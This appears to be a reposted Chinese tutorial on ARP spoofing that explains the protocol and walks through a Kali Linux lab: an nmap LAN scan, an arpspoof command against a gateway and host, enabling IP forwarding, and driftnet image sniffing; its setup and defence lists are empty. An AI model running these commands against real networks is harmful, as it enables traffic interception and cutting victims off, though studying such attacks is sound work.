本文共 837 字,大约阅读时间需要 2 分钟。
ARP 属于 TCP/IP 协议族,负责根据 IP 地址获取 MAC 地址。当一台主机发送数据包时,如果目标主机的 MAC 地址未在本地 ARP 缓存表中,主机会广播一个 ARP 请求报文。此时,局域网内的其他主机会接收该报文,并将请求报文的内容记入本机的 ARP 缓存表。攻击者可以伪造这样的 ARP 请求报文,导致目标主机发送数据包经过攻击者,而非目标主机。
在实验之前,确保以下环境准备就绪:
在 Kali Linux 中:
此时,Kali Linux 已接入局域网。
使用以下命令扫描局域网内的主机:
nmap 192.168.0.0/24
确认局域网网段为 192.168.0.0/24
。
ARP 欺骗 可通过以下命令实现:
arpspoof -i eth0 -t 192.168.0.1 192.168.0.102
-i eth0
:指定要使用的网络接口。-t 192.168.0.1 192.168.0.102
:目标网关和目标主机 IP 地址。此时,目标主机 将无法访问 网络。按下 Ctrl + C
可立即停止攻击。
为了进行图片嗅探,需要启用 IP 转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
然后启动嗅探工具:
driftnet -i eth0
防御ARP 攻击 可采取以下措施:
转载地址:http://twunz.baihongyu.com/